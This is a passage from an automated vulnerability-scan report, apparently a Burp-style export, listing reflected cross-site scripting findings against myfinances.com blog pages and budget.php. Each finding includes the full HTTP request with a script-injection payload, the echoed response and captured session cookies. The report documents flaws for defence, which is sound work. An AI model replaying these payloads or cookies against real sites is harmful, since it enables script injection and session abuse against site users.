Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?%007485b'><script>alert(1)</script>abffe3120a4&page=1'>
...[SNIP]...

1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'">
...[SNIP]...

1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'">
...[SNIP]...

1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'">
...[SNIP]...

1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'">
...[SNIP]...

1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'">
...[SNIP]...

1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'">
...[SNIP]...

1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'">
...[SNIP]...

1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'">
...[SNIP]...

1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'">
...[SNIP]...

1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'">
...[SNIP]...

1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
